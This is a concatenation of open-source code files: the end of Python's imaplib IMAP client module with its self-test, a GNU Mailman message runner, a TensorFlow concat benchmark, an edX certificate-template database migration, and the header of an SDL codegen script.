    return self._untagged_response(typ, dat, 'ANNOTATION')
def setquota(self, root, limits):
    """Set the quota root's resource limits.

    (typ, [data]) = <instance>.setquota(root, limits)
    """
    typ, dat = self._simple_command('SETQUOTA', root, limits)
    # The server echoes the new limits as untagged QUOTA responses.
    return self._untagged_response(typ, dat, 'QUOTA')
def sort(self, sort_criteria, charset, *search_criteria):
    """IMAP4rev1 extension SORT command.

    (typ, [data]) = <instance>.sort(sort_criteria, charset, search_criteria, ...)
    """
    name = 'SORT'
    #if not name in self.capabilities:      # Let the server decide!
    #    raise self.error('unimplemented extension command: %s' % name)
    # Ensure the sort criteria are parenthesized as the grammar requires.
    # NOTE(review): an empty sort_criteria string raises IndexError here;
    # preserved as historical behaviour.
    if (sort_criteria[0],sort_criteria[-1]) != ('(',')'):
        sort_criteria = '(%s)' % sort_criteria
    typ, dat = self._simple_command(name, sort_criteria, charset, *search_criteria)
    return self._untagged_response(typ, dat, name)
def starttls(self, ssl_context=None):
    """Upgrade the established cleartext connection to TLS (RFC 2595).

    Raises self.error if SSL support is missing, and self.abort if TLS
    is already active or the server does not advertise STARTTLS.
    """
    name = 'STARTTLS'
    if not HAVE_SSL:
        raise self.error('SSL support missing')
    if self._tls_established:
        raise self.abort('TLS session already established')
    if name not in self.capabilities:
        raise self.abort('TLS not supported by server')
    # Generate a default SSL context if none was passed.
    if ssl_context is None:
        ssl_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
        # SSLv2 considered harmful.
        ssl_context.options |= ssl.OP_NO_SSLv2
    typ, dat = self._simple_command(name)
    if typ == 'OK':
        self.sock = ssl_context.wrap_socket(self.sock)
        self.file = self.sock.makefile('rb')
        self._tls_established = True
        # Capabilities can legitimately change after TLS; re-query them.
        self._get_capabilities()
    else:
        raise self.error("Couldn't establish TLS session")
    return self._untagged_response(typ, dat, name)
def status(self, mailbox, names):
    """Request named status conditions for mailbox.

    (typ, [data]) = <instance>.status(mailbox, names)
    """
    name = 'STATUS'
    #if self.PROTOCOL_VERSION == 'IMAP4':   # Let the server decide!
    #    raise self.error('%s unimplemented in IMAP4 (obtain IMAP4rev1 server, or re-code)' % name)
    typ, dat = self._simple_command(name, mailbox, names)
    # The conditions come back as an untagged STATUS response.
    return self._untagged_response(typ, dat, name)
def store(self, message_set, command, flags):
    """Alters flag dispositions for messages in mailbox.

    (typ, [data]) = <instance>.store(message_set, command, flags)
    """
    # Parenthesize the flag list if the caller did not.
    # NOTE(review): an empty flags string raises IndexError here;
    # preserved as historical behaviour.
    if (flags[0],flags[-1]) != ('(',')'):
        flags = '(%s)' % flags  # Avoid quoting the flags
    typ, dat = self._simple_command('STORE', message_set, command, flags)
    # The new flag state is reported via untagged FETCH responses.
    return self._untagged_response(typ, dat, 'FETCH')
def subscribe(self, mailbox):
    """Subscribe to new mailbox.

    (typ, [data]) = <instance>.subscribe(mailbox)
    """
    # No untagged data is expected; the tagged status is the answer.
    return self._simple_command('SUBSCRIBE', mailbox)
def thread(self, threading_algorithm, charset, *search_criteria):
    """IMAPrev1 extension THREAD command.

    (type, [data]) = <instance>.thread(threading_algorithm, charset, search_criteria, ...)
    """
    name = 'THREAD'
    typ, dat = self._simple_command(name, threading_algorithm, charset, *search_criteria)
    # Thread structure arrives as an untagged THREAD response.
    return self._untagged_response(typ, dat, name)
def uid(self, command, *args):
    """Execute "command arg ..." with messages identified by UID,
    rather than message number.

    (typ, [data]) = <instance>.uid(command, arg1, arg2, ...)

    Returns response appropriate to 'command'.
    """
    command = command.upper()
    if command not in Commands:
        raise self.error("Unknown IMAP4 UID command: %s" % command)
    if self.state not in Commands[command]:
        raise self.error("command %s illegal in state %s, "
                         "only allowed in states %s" %
                         (command, self.state,
                          ', '.join(Commands[command])))
    typ, dat = self._simple_command('UID', command, *args)
    # SEARCH/SORT/THREAD report data under their own untagged name;
    # everything else is reported via untagged FETCH responses.
    resp_name = command if command in ('SEARCH', 'SORT', 'THREAD') else 'FETCH'
    return self._untagged_response(typ, dat, resp_name)
def unsubscribe(self, mailbox):
"""Unsubscribe from old mailbox.
(typ, [data]) = <instance>.unsubscribe(mailbox)
"""
return self._simple_command('UNSUBSCRIBE', mailbox)
def xatom(self, name, *args):
"""Allow simple extension commands
notified by server in CAPABILITY response.
Assumes command is legal in current state.
(typ, [data]) = <instance>.xatom(name, arg, ...)
Returns response appropriate to extension command `name'.
"""
name = name.upper()
#if not name in self.capabilities: # Let the server decide!
# raise self.error('unknown extension command: %s' % name)
if not name in Commands:
Commands[name] = (self.state,)
return self._simple_command(name, *args)
# Private methods
def _append_untagged(self, typ, dat):
if dat is None:
dat = b''
ur = self.untagged_responses
if __debug__:
if self.debug >= 5:
self._mesg('untagged_responses[%s] %s += ["%r"]' %
(typ, len(ur.get(typ,'')), dat))
if typ in ur:
ur[typ].append(dat)
else:
ur[typ] = [dat]
def _check_bye(self):
bye = self.untagged_responses.get('BYE')
if bye:
raise self.abort(bye[-1].decode('ascii', 'replace'))
def _command(self, name, *args):
    """Send command 'name' with 'args' to the server; return its tag.

    Handles literal arguments (self.literal): a bytes literal is
    announced with '{size}' and sent after the server's continuation
    response; a callable literal ("literator") is invoked with each
    continuation response to produce the data to send.
    """
    if self.state not in Commands[name]:
        self.literal = None
        raise self.error("command %s illegal in state %s, "
                         "only allowed in states %s" %
                         (name, self.state,
                          ', '.join(Commands[name])))

    # Discard stale untagged status responses from earlier commands.
    for typ in ('OK', 'NO', 'BAD'):
        if typ in self.untagged_responses:
            del self.untagged_responses[typ]

    if 'READ-ONLY' in self.untagged_responses \
            and not self.is_readonly:
        raise self.readonly('mailbox status changed to READ-ONLY')

    tag = self._new_tag()
    name = bytes(name, 'ASCII')
    data = tag + b' ' + name
    for arg in args:
        if arg is None: continue
        if isinstance(arg, str):
            arg = bytes(arg, "ASCII")
        data = data + b' ' + arg

    literal = self.literal
    if literal is not None:
        self.literal = None
        # A function-typed literal is a generator of literal data.
        if type(literal) is type(self._command):
            literator = literal
        else:
            literator = None
            data = data + bytes(' {%s}' % len(literal), 'ASCII')

    if __debug__:
        if self.debug >= 4:
            self._mesg('> %r' % data)
        else:
            self._log('> %r' % data)

    try:
        self.send(data + CRLF)
    except (socket.error, OSError) as val:
        raise self.abort('socket error: %s' % val)

    if literal is None:
        return tag

    while 1:
        # Wait for continuation response
        while self._get_response():
            if self.tagged_commands[tag]:   # BAD/NO?
                return tag

        # Send literal
        if literator:
            literal = literator(self.continuation_response)

        if __debug__:
            if self.debug >= 4:
                self._mesg('write literal size %s' % len(literal))

        try:
            self.send(literal)
            self.send(CRLF)
        except (socket.error, OSError) as val:
            raise self.abort('socket error: %s' % val)

        # A plain bytes literal is sent exactly once.
        if not literator:
            break

    return tag
def _command_complete(self, name, tag):
    """Wait for the tagged response to 'tag'; return (typ, data).

    Re-raises abort/error with the command name folded into the message.
    A 'BAD' completion always becomes self.error.
    """
    # BYE is expected after LOGOUT
    if name != 'LOGOUT':
        self._check_bye()
    try:
        typ, data = self._get_tagged_response(tag)
    except self.abort as val:
        raise self.abort('command: %s => %s' % (name, val))
    except self.error as val:
        raise self.error('command: %s => %s' % (name, val))
    # A BYE may have arrived while we were waiting (e.g. server timeout).
    if name != 'LOGOUT':
        self._check_bye()
    if typ == 'BAD':
        raise self.error('%s command error: %s %s' % (name, typ, data))
    return typ, data
def _get_capabilities(self):
typ, dat = self.capability()
if dat == [None]:
raise self.error('no CAPABILITY response from server')
dat = str(dat[-1], "ASCII")
dat = dat.upper()
self.capabilities = tuple(dat.split())
def _get_response(self):

    # Read response and store.
    #
    # Returns None for continuation responses,
    # otherwise first response line received.

    resp = self._get_line()

    # Command completion response?

    if self._match(self.tagre, resp):
        tag = self.mo.group('tag')
        if not tag in self.tagged_commands:
            raise self.abort('unexpected tagged response: %s' % resp)

        typ = self.mo.group('type')
        typ = str(typ, 'ASCII')
        dat = self.mo.group('data')
        # Completes the pending command: _get_tagged_response polls this.
        self.tagged_commands[tag] = (typ, [dat])
    else:
        dat2 = None

        # '*' (untagged) responses?

        if not self._match(Untagged_response, resp):
            if self._match(Untagged_status, resp):
                dat2 = self.mo.group('data2')

        if self.mo is None:
            # Only other possibility is '+' (continuation) response...

            if self._match(Continuation, resp):
                self.continuation_response = self.mo.group('data')
                return None     # NB: indicates continuation

            raise self.abort("unexpected response: '%s'" % resp)

        typ = self.mo.group('type')
        typ = str(typ, 'ascii')
        dat = self.mo.group('data')
        if dat is None: dat = b''       # Null untagged response
        if dat2: dat = dat + b' ' + dat2

        # Is there a literal to come?

        while self._match(Literal, dat):

            # Read literal direct from connection.

            size = int(self.mo.group('size'))
            if __debug__:
                if self.debug >= 4:
                    self._mesg('read literal size %s' % size)
            data = self.read(size)

            # Store response with literal as tuple

            self._append_untagged(typ, (dat, data))

            # Read trailer - possibly containing another literal

            dat = self._get_line()

        self._append_untagged(typ, dat)

    # Bracketed response information?

    if typ in ('OK', 'NO', 'BAD') and self._match(Response_code, dat):
        typ = self.mo.group('type')
        typ = str(typ, "ASCII")
        self._append_untagged(typ, self.mo.group('data'))

    if __debug__:
        if self.debug >= 1 and typ in ('NO', 'BAD', 'BYE'):
            self._mesg('%s response: %r' % (typ, dat))

    return resp
def _get_tagged_response(self, tag):
    """Block reading responses until the one tagged 'tag' completes."""
    while 1:
        result = self.tagged_commands[tag]
        if result is not None:
            # Consume the completed entry and hand it back.
            del self.tagged_commands[tag]
            return result

        # Some have reported "unexpected response" exceptions.
        # Note that ignoring them here causes loops.
        # Instead, send me details of the unexpected response and
        # I'll update the code in `_get_response()'.

        try:
            self._get_response()
        except self.abort as val:
            if __debug__:
                if self.debug >= 1:
                    self.print_log()
            raise
def _get_line(self):
line = self.readline()
if not line:
raise self.abort('socket error: EOF')
# Protocol mandates all lines terminated by CRLF
if not line.endswith(b'\r\n'):
raise self.abort('socket error: unterminated line')
line = line[:-2]
if __debug__:
if self.debug >= 4:
self._mesg('< %r' % line)
else:
self._log('< %r' % line)
return line
def _match(self, cre, s):
# Run compiled regular expression match method on 's'.
# Save result, return success.
self.mo = cre.match(s)
if __debug__:
if self.mo is not None and self.debug >= 5:
self._mesg("\tmatched r'%r' => %r" % (cre.pattern, self.mo.groups()))
return self.mo is not None
def _new_tag(self):
tag = self.tagpre + bytes(str(self.tagnum), 'ASCII')
self.tagnum = self.tagnum + 1
self.tagged_commands[tag] = None
return tag
def _quote(self, arg):
arg = arg.replace('\\', '\\\\')
arg = arg.replace('"', '\\"')
return '"' + arg + '"'
def _simple_command(self, name, *args):
    # Send the command and block for its tagged completion response.
    return self._command_complete(name, self._command(name, *args))
def _untagged_response(self, typ, dat, name):
if typ == 'NO':
return typ, dat
if not name in self.untagged_responses:
return typ, [None]
data = self.untagged_responses.pop(name)
if __debug__:
if self.debug >= 5:
self._mesg('untagged_responses[%s] => %s' % (name, data))
return typ, data
if __debug__:

    def _mesg(self, s, secs=None):
        """Write a '<MM:SS.cc> message' debug line to stderr."""
        if secs is None:
            secs = time.time()
        tm = time.strftime('%M:%S', time.localtime(secs))
        sys.stderr.write(' %s.%02d %s\n' % (tm, (secs*100)%100, s))
        sys.stderr.flush()

    def _dump_ur(self, dict):
        # Dump untagged responses (in `dict').
        l = dict.items()
        if not l: return
        t = '\n\t\t'
        l = map(lambda x:'%s: "%s"' % (x[0], x[1][0] and '" "'.join(x[1]) or ''), l)
        self._mesg('untagged responses dump:%s%s' % (t, t.join(l)))

    def _log(self, line):
        # Keep log of last `_cmd_log_len' interactions for debugging.
        # The log is a fixed-size ring buffer indexed by _cmd_log_idx.
        self._cmd_log[self._cmd_log_idx] = (line, time.time())
        self._cmd_log_idx += 1
        if self._cmd_log_idx >= self._cmd_log_len:
            self._cmd_log_idx = 0

    def print_log(self):
        """Replay the ring buffer of recent interactions via _mesg."""
        self._mesg('last %d IMAP4 interactions:' % len(self._cmd_log))
        i, n = self._cmd_log_idx, self._cmd_log_len
        while n:
            try:
                self._mesg(*self._cmd_log[i])
            except:
                # Slots never written yet raise KeyError/IndexError; skip.
                pass
            i += 1
            if i >= self._cmd_log_len:
                i = 0
            n -= 1
if HAVE_SSL:

    class IMAP4_SSL(IMAP4):

        """IMAP4 client class over SSL connection

        Instantiate with: IMAP4_SSL([host[, port[, keyfile[, certfile]]]])

                host - host's name (default: localhost);
                port - port number (default: standard IMAP4 SSL port).
                keyfile - PEM formatted file that contains your private key (default: None);
                certfile - PEM formatted certificate chain file (default: None);

        for more documentation see the docstring of the parent class IMAP4.
        """

        def __init__(self, host = '', port = IMAP4_SSL_PORT, keyfile = None, certfile = None):
            self.keyfile = keyfile
            self.certfile = certfile
            IMAP4.__init__(self, host, port)

        def _create_socket(self):
            # Wrap the parent's plain TCP socket in SSL.
            # NOTE(review): ssl.wrap_socket() is deprecated in newer Python
            # releases in favour of SSLContext.wrap_socket().
            sock = IMAP4._create_socket(self)
            return ssl.wrap_socket(sock, self.keyfile, self.certfile)

        def open(self, host='', port=IMAP4_SSL_PORT):
            """Setup connection to remote server on "host:port".
                (default: localhost:standard IMAP4 SSL port).
            This connection will be used by the routines:
                read, readline, send, shutdown.
            """
            IMAP4.open(self, host, port)

    __all__.append("IMAP4_SSL")
class IMAP4_stream(IMAP4):

    """IMAP4 client class over a stream

    Instantiate with: IMAP4_stream(command)

            where "command" is a string that can be passed to subprocess.Popen()

    for more documentation see the docstring of the parent class IMAP4.
    """

    def __init__(self, command):
        self.command = command
        IMAP4.__init__(self)

    def open(self, host = None, port = None):
        """Setup a stream connection.
        This connection will be used by the routines:
            read, readline, send, shutdown.
        """
        self.host = None        # For compatibility with parent class
        self.port = None
        self.sock = None
        self.file = None
        # Talk IMAP to a subprocess over its stdin/stdout pipes.
        self.process = subprocess.Popen(self.command,
            stdin=subprocess.PIPE, stdout=subprocess.PIPE,
            shell=True, close_fds=True)
        self.writefile = self.process.stdin
        self.readfile = self.process.stdout

    def read(self, size):
        """Read 'size' bytes from remote."""
        return self.readfile.read(size)

    def readline(self):
        """Read line from remote."""
        return self.readfile.readline()

    def send(self, data):
        """Send data to remote."""
        self.writefile.write(data)
        self.writefile.flush()

    def shutdown(self):
        """Close I/O established in "open"."""
        self.readfile.close()
        self.writefile.close()
        # Reap the subprocess to avoid leaving a zombie.
        self.process.wait()
class _Authenticator:
"""Private class to provide en/decoding
for base64-based authentication conversation.
"""
def __init__(self, mechinst):
self.mech = mechinst # Callable object to provide/process data
def process(self, data):
ret = self.mech(self.decode(data))
if ret is None:
return '*' # Abort conversation
return self.encode(ret)
def encode(self, inp):
#
# Invoke binascii.b2a_base64 iteratively with
# short even length buffers, strip the trailing
# line feed from the result and append. "Even"
# means a number that factors to both 6 and 8,
# so when it gets to the end of the 8-bit input
# there's no partial 6-bit output.
#
oup = ''
while inp:
if len(inp) > 48:
t = inp[:48]
inp = inp[48:]
else:
t = inp
inp = ''
e = binascii.b2a_base64(t)
if e:
oup = oup + e[:-1]
return oup
def decode(self, inp):
if not inp:
return ''
return binascii.a2b_base64(inp)
# Month abbreviation (bytes, as they appear in INTERNALDATE) -> month number.
Mon2num = {b'Jan': 1, b'Feb': 2, b'Mar': 3, b'Apr': 4, b'May': 5, b'Jun': 6,
           b'Jul': 7, b'Aug': 8, b'Sep': 9, b'Oct': 10, b'Nov': 11, b'Dec': 12}
def Internaldate2tuple(resp):
    """Parse an IMAP4 INTERNALDATE string.

    Return corresponding local time.  The return value is a
    time.struct_time tuple or None if the string has wrong format.
    """
    # InternalDate is a module-level compiled regex (defined earlier in
    # this file) with named groups for each date/zone component.
    mo = InternalDate.match(resp)
    if not mo:
        return None

    mon = Mon2num[mo.group('mon')]
    zonen = mo.group('zonen')

    day = int(mo.group('day'))
    year = int(mo.group('year'))
    hour = int(mo.group('hour'))
    min = int(mo.group('min'))
    sec = int(mo.group('sec'))
    zoneh = int(mo.group('zoneh'))
    zonem = int(mo.group('zonem'))

    # INTERNALDATE timezone must be subtracted to get UT
    zone = (zoneh*60 + zonem)*60
    if zonen == b'-':
        zone = -zone

    tt = (year, mon, day, hour, min, sec, -1, -1, -1)

    utc = time.mktime(tt)

    # Following is necessary because the time module has no 'mkgmtime'.
    # 'mktime' assumes arg in local timezone, so adds timezone/altzone.

    lt = time.localtime(utc)
    if time.daylight and lt[-1]:
        zone = zone + time.altzone
    else:
        zone = zone + time.timezone

    return time.localtime(utc - zone)
def Int2AP(num):
    """Convert integer to A-P string representation."""
    # Base-16 digits drawn from 'A'..'P' (tag alphabet).
    digits = b'ABCDEFGHIJKLMNOP'
    num = int(abs(num))
    out = b''
    while num:
        num, rem = divmod(num, 16)
        out = digits[rem:rem+1] + out
    return out
def ParseFlags(resp):
    """Convert IMAP4 flags response to python tuple."""
    # Flags is a module-level compiled regex (defined earlier in the file)
    # whose 'flags' group holds the space-separated flag atoms.
    mo = Flags.match(resp)
    if not mo:
        return ()

    return tuple(mo.group('flags').split())
def Time2Internaldate(date_time):
    """Convert date_time to IMAP4 INTERNALDATE representation.

    Return string in form: '"DD-Mmm-YYYY HH:MM:SS +HHMM"'.  The
    date_time argument can be a number (int or float) representing
    seconds since epoch (as returned by time.time()), a 9-tuple
    representing local time (as returned by time.localtime()), or a
    double-quoted string.  In the last case, it is assumed to already
    be in the correct format.
    """
    if isinstance(date_time, (int, float)):
        tt = time.localtime(date_time)
    elif isinstance(date_time, (tuple, time.struct_time)):
        tt = date_time
    elif isinstance(date_time, str) and (date_time[0],date_time[-1]) == ('"','"'):
        return date_time        # Assume in correct format
    else:
        raise ValueError("date_time not of a known type")

    # BUG FIX: strftime('%b') is locale-dependent and can produce month
    # abbreviations the INTERNALDATE grammar does not allow.  Use a fixed
    # English month table instead (index 0 unused; tt[1] is the month).
    months = (None, 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
              'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')
    dt = time.strftime("%d-%%s-%Y %H:%M:%S", tt) % months[tt[1]]
    # Day-of-month is space-padded, not zero-padded, in INTERNALDATE.
    if dt[0] == '0':
        dt = ' ' + dt[1:]
    if time.daylight and tt[-1]:
        zone = -time.altzone
    else:
        zone = -time.timezone
    return '"' + dt + " %+03d%02d" % divmod(zone//60, 60) + '"'
if __name__ == '__main__':

    # To test: invoke either as 'python imaplib.py [IMAP4_server_hostname]'
    # or 'python imaplib.py -s "rsh IMAP4_server_hostname exec /etc/rimapd"'
    # to test the IMAP4_stream class

    import getopt, getpass

    try:
        optlist, args = getopt.getopt(sys.argv[1:], 'd:s:')
    except getopt.error as val:
        optlist, args = (), ()

    stream_command = None
    for opt,val in optlist:
        if opt == '-d':
            # -d N sets the module-level Debug verbosity.
            Debug = int(val)
        elif opt == '-s':
            stream_command = val
            if not args: args = (stream_command,)

    if not args: args = ('',)

    host = args[0]

    USER = getpass.getuser()
    PASSWD = getpass.getpass("IMAP password for %s on %s: " % (USER, host or "localhost"))

    test_mesg = 'From: %(user)s@localhost%(lf)sSubject: IMAP4 test%(lf)s%(lf)sdata...%(lf)s' % {'user':USER, 'lf':'\n'}
    # First sequence: authenticated-state commands exercising mailbox CRUD.
    test_seq1 = (
    ('login', (USER, PASSWD)),
    ('create', ('/tmp/xxx 1',)),
    ('rename', ('/tmp/xxx 1', '/tmp/yyy')),
    ('CREATE', ('/tmp/yyz 2',)),
    ('append', ('/tmp/yyz 2', None, None, test_mesg)),
    ('list', ('/tmp', 'yy*')),
    ('select', ('/tmp/yyz 2',)),
    ('search', (None, 'SUBJECT', 'test')),
    ('fetch', ('1', '(FLAGS INTERNALDATE RFC822)')),
    ('store', ('1', 'FLAGS', '(\Deleted)')),
    ('namespace', ()),
    ('expunge', ()),
    ('recent', ()),
    ('close', ()),
    )

    # Second sequence: selected-state/UID commands ending with LOGOUT.
    test_seq2 = (
    ('select', ()),
    ('response',('UIDVALIDITY',)),
    ('uid', ('SEARCH', 'ALL')),
    ('response', ('EXISTS',)),
    ('append', (None, None, None, test_mesg)),
    ('recent', ()),
    ('logout', ()),
    )

    def run(cmd, args):
        # Invoke method 'cmd' on the shared connection M with 'args',
        # logging the exchange; a 'NO' completion is raised as an error.
        M._mesg('%s %s' % (cmd, args))
        typ, dat = getattr(M, cmd)(*args)
        M._mesg('%s => %s %s' % (cmd, typ, dat))
        if typ == 'NO': raise dat[0]
        return dat

    try:
        if stream_command:
            M = IMAP4_stream(stream_command)
        else:
            M = IMAP4(host)
        if M.state == 'AUTH':
            test_seq1 = test_seq1[1:]   # Login not needed
        M._mesg('PROTOCOL_VERSION = %s' % M.PROTOCOL_VERSION)
        M._mesg('CAPABILITIES = %r' % (M.capabilities,))

        for cmd,args in test_seq1:
            run(cmd, args)

        # Clean up the test mailboxes created above.
        for ml in run('list', ('/tmp/', 'yy%')):
            mo = re.match(r'.*"([^"]+)"$', ml)
            if mo: path = mo.group(1)
            else: path = ml.split()[-1]
            run('delete', (path,))

        for cmd,args in test_seq2:
            dat = run(cmd, args)

            if (cmd,args) != ('uid', ('SEARCH', 'ALL')):
                continue

            uid = dat[-1].split()
            if not uid: continue
            run('uid', ('FETCH', '%s' % uid[-1],
                    '(FLAGS INTERNALDATE RFC822.SIZE RFC822.HEADER RFC822.TEXT)'))

        print('\nAll tests OK.')

    except:
        print('\nTests failed.')

        if not Debug:
            print('''
If you would like to see debugging output,
try: %s -d5
''' % sys.argv[0])

        raise
| apache-2.0 |
terencehonles/mailman | src/mailman/runners/virgin.py | 3 | 1471 | # Copyright (C) 1998-2012 by the Free Software Foundation, Inc.
#
# This file is part of GNU Mailman.
#
# GNU Mailman is free software: you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# GNU Mailman is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along with
# GNU Mailman. If not, see <http://www.gnu.org/licenses/>.
"""Virgin runner.
This runner handles messages that the Mailman system gives virgin birth to.
E.g. acknowledgment responses to user posts or replybot messages. They need
to go through some minimal processing before they can be sent out to the
recipient.
"""
from mailman.core.pipelines import process
from mailman.core.runner import Runner
class VirginRunner(Runner):
    """Runner for messages Mailman itself originates (acks, replybot)."""

    def _dispose(self, mlist, msg, msgdata):
        # Fast-track the message through any pipeline handlers that touch
        # it, e.g. especially cook-headers, then push it through the
        # 'virgin' pipeline.
        msgdata['_fasttrack'] = True
        process(mlist, msg, msgdata, 'virgin')
        # False tells the runner not to keep this message queued.
        return False
| gpl-3.0 |
calebfoss/tensorflow | tensorflow/python/ops/concat_benchmark.py | 178 | 5247 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Benchmark for split and grad of split."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import random
import time
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session as session_lib
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
def build_graph(device, input_shape, variable, num_inputs, axis, grad):
  """Build a graph containing a sequence of concat operations.

  Args:
    device: string, the device to run on.
    input_shape: shape of the input tensors.
    variable: whether or not to randomize the input shape
    num_inputs: the number of inputs to concat
    axis: axis to be concat'ed
    grad: if True compute the gradient

  Returns:
    An array of tensors to run()
  """
  with ops.device("/%s:0" % device):
    if not variable:
      inputs = [array_ops.zeros(input_shape) for _ in range(num_inputs)]
    else:
      # Randomize the size of the dimension being concatenated (+/- 5,
      # floored at 1) per input, so the kernel sees non-uniform shapes.
      if axis == 1:
        inputs = [
            array_ops.zeros([
                input_shape[0],
                random.randint(max(1, input_shape[1] - 5), input_shape[1] + 5)
            ]) for _ in range(num_inputs)
        ]
      else:
        inputs = [
            array_ops.zeros([
                random.randint(max(1, input_shape[0] - 5), input_shape[0] + 5),
                input_shape[1]
            ]) for _ in range(num_inputs)
        ]

    # 100 identical concat ops amortize per-step session overhead.
    outputs = [array_ops.concat(inputs, axis) for _ in range(100)]
    if grad:
      # Flatten the per-output gradient lists into one group op.
      return control_flow_ops.group(*list(
          itertools.chain.from_iterable([
              gradients_impl.gradients(output, inputs) for output in outputs
          ])))
    else:
      return control_flow_ops.group(*outputs)
class ConcatBenchmark(test.Benchmark):
  """Benchmark concat."""

  def _run_graph(self, device, input_shape, variable, num_inputs, axis, grad,
                 num_iters):
    """Run the graph and print its execution time.

    Args:
      device: string, the device to run on.
      input_shape: shape of the input tensors.
      variable: whether or not the input shape should be fixed
      num_inputs: the number of inputs to concat
      axis: axis to be concat'ed
      grad: if True compute the gradient
      num_iters: number of steps to run.

    Returns:
      The duration of the run in seconds.
    """
    graph = ops.Graph()
    with graph.as_default():
      outputs = build_graph(device, input_shape, variable, num_inputs, axis,
                            grad)
      # Disable graph optimizations so the concat ops are actually executed.
      config = config_pb2.ConfigProto(graph_options=config_pb2.GraphOptions(
          optimizer_options=config_pb2.OptimizerOptions(
              opt_level=config_pb2.OptimizerOptions.L0)))
      with session_lib.Session(graph=graph, config=config) as session:
        variables.global_variables_initializer().run()
        _ = session.run(outputs)  # warm up.
        start_time = time.time()
        for _ in range(num_iters):
          _ = session.run(outputs)
        duration = time.time() - start_time
        # Throughput assumes: num_inputs tensors * shape elements * 4 bytes
        # * 2 (read+write) * 100 concat ops per step.
        print("%s shape:%d/%d var: %r #inputs:%d axis:%d grad:%r - %f secs - %f "
              "GB/sec" % (device, input_shape[0], input_shape[1], variable,
                          num_inputs, axis, grad, duration / num_iters,
                          num_inputs * input_shape[0] * input_shape[1] * 4 * 2 *
                          100 / (duration / num_iters) / 1e9))
      name_template = (
          "concat_bench_{device}_input_shape_{shape}_variable_{variable}"
          "_num_inputs_{num_inputs}_axis_{axis}_grad_{grad}")
      # NOTE(review): 'iters' is passed to format() but has no {iters}
      # placeholder in the template, so it is silently ignored.
      self.report_benchmark(name=name_template.format(
          device=device,
          num_inputs=num_inputs,
          variable=variable,
          grad=grad,
          shape=str(input_shape).replace(" ", ""),
          axis=str(axis),
          iters=num_iters))
      return duration

  def benchmark_concat(self):
    """Sweep shapes/axes/variability and time forward and backward concat."""
    print("Forward vs backward concat")
    shapes = [[2000, 8], [8, 2000], [100, 18], [1000, 18], [100, 97],
              [1000, 97], [10000, 1], [1, 10000]]
    axis_ = [0, 1]
    num_inputs = 20
    num_iters = [10] * len(shapes)
    variable = [False, True]  # fixed input size or not
    for shape, iters in zip(shapes, num_iters):
      for axis in axis_:
        for v in variable:
          self._run_graph("cpu", shape, v, num_inputs, axis, True, iters)
# Run the benchmark suite when executed directly.
if __name__ == "__main__":
  test.main()
| apache-2.0 |
philanthropy-u/edx-platform | lms/djangoapps/certificates/migrations/0011_certificatetemplate_alter_unique.py | 17 | 2345 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from django.db import migrations, models
from opaque_keys.edx.django.models import CourseKeyField
from opaque_keys.edx.keys import CourseKey
log = logging.getLogger(__name__)
def revert_alter_unique(apps, schema_editor):
    """Reverse-migration cleanup: delete language-specific duplicates.

    So that the old (organization_id, course_key, mode) uniqueness can be
    restored, keep only one template per (org, course, mode) triple and
    delete the rest, logging each deleted row's details.
    """
    CertificateTemplateModel = apps.get_model("certificates", "CertificateTemplate")
    all_unique_templates_ignoring_language = CertificateTemplateModel.objects.values_list(
        "organization_id",
        "course_key",
        "mode").distinct()
    for org_id, course_key, mode in all_unique_templates_ignoring_language:
        # values_list() returns course_key as a string; convert back for the
        # CourseKeyField filter, treating '' as the Empty sentinel.
        key = CourseKey.from_string(course_key) if course_key else CourseKeyField.Empty
        templates = CertificateTemplateModel.objects.filter(organization_id=org_id, course_key=key, mode=mode)
        if templates.count() > 1:
            # remove all templates past the first (null or default languages are ordered first)
            # NOTE(review): NULL ordering under order_by('language') is
            # database-backend dependent; confirm for the deployed backend.
            language_specific_templates = templates.order_by('language')[1:]
            language_specific_template_ids = language_specific_templates.values_list('id', flat=True)
            for template in language_specific_templates:
                log.info('Deleting template ' + str(template.id) + ' with details {' +
                         " name: "+ str(template.name) +
                         " description: "+ str(template.description) +
                         " template: "+ str(template.template) +
                         " organization_id: "+ str(template.organization_id) +
                         " course_key: "+ str(template.course_key) +
                         " mode: "+ str(template.mode) +
                         " is_active: "+ str(template.is_active) +
                         " language: "+ str(template.language) + " }"
                         )
            CertificateTemplateModel.objects.filter(id__in=list(language_specific_template_ids)).delete()
class Migration(migrations.Migration):
    """Add 'language' to CertificateTemplate's unique_together constraint.

    Forward needs no data changes (the new constraint is strictly looser);
    reversing runs revert_alter_unique first to delete rows that would
    violate the restored, tighter constraint.
    """

    dependencies = [
        ('certificates', '0010_certificatetemplate_language'),
    ]

    operations = [
        migrations.AlterUniqueTogether(
            name='certificatetemplate',
            unique_together=set([('organization_id', 'course_key', 'mode', 'language')]),
        ),
        # Forward is a no-op; the cleanup only runs on reverse migration.
        migrations.RunPython(migrations.RunPython.noop, reverse_code=revert_alter_unique)
    ]
| agpl-3.0 |
AByzhynar/sdl_core | src/components/dbus/codegen/make_notifications_qml.py | 13 | 18086 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @file make_qml_dbus_cpp.py
# @brief Generator of QML to QDbus C++ part
#
